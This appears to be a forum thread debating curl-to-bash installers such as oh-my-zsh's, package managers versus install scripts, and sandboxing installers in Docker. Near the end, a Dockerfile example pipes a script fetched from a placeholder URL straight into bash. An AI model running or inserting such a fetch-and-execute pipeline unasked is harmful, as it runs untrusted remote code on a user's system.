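  $ xdg-user-dir DOWNLOAD
  /home/alice/Downloads
  $ grep DOWNLOAD ~/.config/user-dirs.dirs
  XDG_DOWNLOAD_DIR="$HOME/Downloads"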
Only in English locales. Although yes, most users are in that locale.
Quite a few applications do this.
For something like the mentioned oh-my-zsh, it can be safely assumed the user is not a novice in most cases. Having to install in this manner may in fact deter the user, as they'd be suspicious. A well written README would be the better route.
Not always. Lots of programs that do this might be targeted for intermediate users. Brew is the first thing that comes to mind.
I seem to recall a case of a certain application that uses curl to bash to install docker, docker-compose, and finally create its containers. The problem lies with the fact that said script made the mistakes of trying to pull Docker from Docker's own repositories instead of using the one from the distro, and of thinking $distro_based_on_ubuntu (I think it was Mint) is Ubuntu. A mess was made and I had to help some guy fix it.
I don't remember all of the times I've encountered it but a couple of examples I remember are rustup with its 700 lines of shell script (although you can install rust normally of course) and pi hole with its whopping 2700 lines of shell script.
> rustup with its 700 lines of shell script
I wouldn't trust a shipping shell script with less than 200 lines just re: sanity checks.
Large shell script programming stinks. The person who wrote it probably swore off shell as soon as they were done. But it is portable and it isn't half the pain that packaging for several distros is.
When I want to be careful about running these setup scripts, especially just for trying out new software, I run them in a docker container to limit whatever damage the scripts can cause. When the script is complicated, I tend to use docker instead of trying to understand the script and then run it on the 'real' system.
Then when I really like the software and want to install it on the 'real' system, if there's much benefit in doing so, I spend more time and effort understanding the script. More often than not, I end up not doing this because there is no compelling need to install the software on the 'real' system.
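Roughly this, as a throwaway sandbox (image and mount path picked arbitrarily):

  # poke at an untrusted installer without letting it touch the real system
  docker run --rm -it -v "$PWD:/work" debian:stable bash
  # then, inside the container:
  bash /work/install.sh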
Really, the risk here is that the installer is going to do something unfortunate, like delete everything in your filesystem because you have a space in your home directory name, or cause problems because your .profile didn't end with a newline and it blindly appended its own stuff to it.
I'm not sure how package managers prevent this sort of issue, but in general running shell scripts as root (and it probably needs to run as root) is a bad thing.
Some package managers don’t really prevent this, particularly thinking of npm but also apt and other system package managers, because they can run arbitrary post-install scripts.
As always, you need to trust the vendor of software you install and/or do an audit of the source/installer regardless.
The title and the content don't match. The omzsh installer behavior is orthogonal to piping it from curl to bash.
On the other hand, It's often the case that your machine is running scripts that have been fetched online via apt and the like and it's definitely something to consider especially with all the hacks that have been happening in the last few years and the undisclosed vulnerabilities available in the wild.
Reading all the comments not understanding the problem is a great way to feel old. It's definitely a new generation, only in the bad way: instead of meaning new energy, imagination, and progress, it just means they forgot or never learned important concepts and principles.
You do not take liberties with someone else's system, there is no need to do it and no excuse for it. You can have a reference example "make install" in your build system that serves as a reference for the packagers without you having to worry about all the 80 different distros. And it better also have a "make uninstall".
Respecting the possibility that a config file or even the bins and libs might already exist as part of the "make install", are just part of the job like writing the software itself, not some unreasonable extra burden.
If you're that much of a baby then I do not want your 'free' gift software and nor should anyone else. What other corners are you cutting everywhere else in the software? What other gross lack of integrity do you think is ok?
Maybe this is more the result of turning every random application into its own container. It's fine to have an app installer configure the entire system to suit itself when the entire system is just the container to house the app.
> You do not take liberties with someone else's system, there is no need to do it and no excuse for it.
The whole point of the oh-my-zsh installation script is to modify your system to work with oh-my-zsh. If you don't want your system modified, you shouldn't run it: there is no other point of that script.
Build instructions are a completely separate thing, and are a complete distraction. No one sane waits for some random distro to discover your software and decide to package it themselves as a means of distributing it.
As far as most people are concerned, the role of things like apt or rpm is to manage the base system. Installing and keeping application software up to date is best left to the applications themselves - as it has always been on Windows or MacOS (before the app store craze), as it should be. It is not and should not be up to the Debian maintainers to tell me what version of Firefox to use, or how often I should update it.
Edit:
> Respecting the possibility that a config file or even the bins and libs might already exist as part of the "make install", are just part of the job like writing the software itself, not some unreasonable extra burden.
I assume you are referring to the author's complaint about the installer overriding their ~/.zshrc. If so, then that is again a misunderstanding of the point of this script - it explicitly tells you right in the description that it will do that AND it keeps the old file around in case you still need it.
To explain again - oh-my-zsh is a system for controlling your zsh installation. Its whole purpose is to take over things like your .zshrc file. This is explained very clearly on their main page, so running that script and expecting it to not modify your zsh settings is like installing Firefox and expecting it not to connect to the Internet when you type a URL in the address bar.
It's not just omz, as the article itself also says, omz is just an example and actually one of the less extreme ones.
Similar assumptions and liberties are more and more common, changing all manner of system-wide default behavior, not just a user's own configs, sometimes even in direct conflict with other software that wants to make its own system-wide config, such that you nominally couldn't have both things at the same time. Whichever you installed second would work and break the other. In reality neither one actually needed to make such assumptions or break anything else; they could have coexisted fine. It was just grossly and inexcusably inconsiderate installers and directions.
Package managers are sometimes great for the user, and as mentioned, a pain for the developer in many cases. To cover even "basic" bases, the developer has to manage many package managers. Ouch.
From the user side, the package manager often doesn't do what I want, either. I could install Node (as an example) via `apt` or `yum`, and end up with a Node installed in a root location. Now I'm in a mess. Or I could use an install script, or even yet another 3rd-party solution such as `npm`, to do what I actually want: Node installed for me. ...of course, I just mentioned a whole other can of worms: all the "other" package managers out there.
TL;DR: KISS often is the best solution.
Dive into the details of what "clean" packaging entails, how much practices differs between distributions, how many distributions there are, how each dependency also needs to be packaged and maintained across upgrades...
And you'll quickly see why projects say fsck it -- we support installation via curl | bash; go and package it yourself if you want to.
It really highlights the need for a broadly adopted "homebrew for linux" type package manager that could safely manage software without conflicting with OS packages.
Homebrew is Homebrew for Linux. You can install and use brew(1) on Linux. The Homebrew github worker even generates linux/amd64 binary "bottles" for each Homebrew package to make it fast (as long as the package doesn't explicitly opt out of Linux support.)
> "homebrew for linux" type package manager that could safely manage software without conflicting with OS packages.
As someone who uses Homebrew for Linux, I can say that "without conflicting with OS packages" cuts both ways: fine, I get more modern stuff than apt could imagine, but having to monkey with LD_LIBRARY_PATH or -Wl,-rpath over and over gets old real fast. I have no idea why they tried to be so cute putting things in a stupid directory (/home/linuxbrew/.linuxbrew) instead of /usr/local like they did with Homebrew for Mac (err, not the arm64 version, where they went back to /opt/homebrew for who knows why)
piping curl to bash is a heresy, an abomination that cannot be tolerated. it is an affront to my intellect and sensibility. it is an ethical turpitude and degeneracy that cannot be understated in its depravity.
It reduces the user to nothing more than an endured, pseudotrustworthy ball of lard in the developer's formal equation of installation. As it is an installation, however, it beseeches the administrator, the root, the owner and the light of this system that it may achieve its purpose, and in doing so is a blasphemy. It supplants my GNUlike will and in its stead enforces the hopes and dreams of nothing more than a transient, a visitor.
For the last time: The ground your code touches is holy and hallowed. The rites of Posix and the decree of the Unix philosophy at the sides of the throne you approach alone implore you not to speak unless spoken to, unless absolutely in the favor of the god of this land. To sudo curl|/bin/bash is to commit an unspeakable treason in the divine presence, a sin unforgivable before the light of the PTY and the TTY. To take the sudo sword of the emperor alone and wield it as you see fit is damnable contempt indeed.
> GPT-3, please explain the above in simple English a five year old can understand.
Doing something called "piping curl to bash" is not a good idea. It's like trying to do something on someone else's computer without asking permission first. It puts you in the place of being in charge, even though it isn't your computer. Doing this can cause trouble and make the person who owns the computer very unhappy with you.
> OK, now explain the above in verses of King James English.
Behold, the ground thy code doth touch, Is holy and hallowed much. The rites of Posix and decree, Beseech thee not to speak unless spoken free. Alone thou approachest the throne divine, Unless in favor of God's law thine. To wield the sudo sword alone is sin most dire, And damnable contempt before heaven's fire. Forsooth 'tis treason unspeakable this day! curl|/bin/bash shalt thou never say!

I've never been much for religion but maybe I just haven't gotten into the right stuff. Can I confess to you the sins of my .vimrc?
Bash installers are neat, fast and dirty. They shine inside a Dockerfile, because they enable you to install not-yet-packaged software.
To avoid regretting launching them, I configured sudo to ask me for a password, to avoid some malicious sudo command in the wild destroying my box or wiping my NAS drives... who knows? :)
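A sketch of the Dockerfile use mentioned above (the URL is a placeholder):

  FROM debian:stable-slim
  RUN apt-get update && apt-get install -y --no-install-recommends curl ca-certificates
  # the whole point of the image is to contain whatever the script does
  RUN curl -fsSL https://example.com/install.sh | bash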
The entire point of Oh My Zsh is to get a specially crafted instance of Zsh, so of course it overwrites your .zshrc.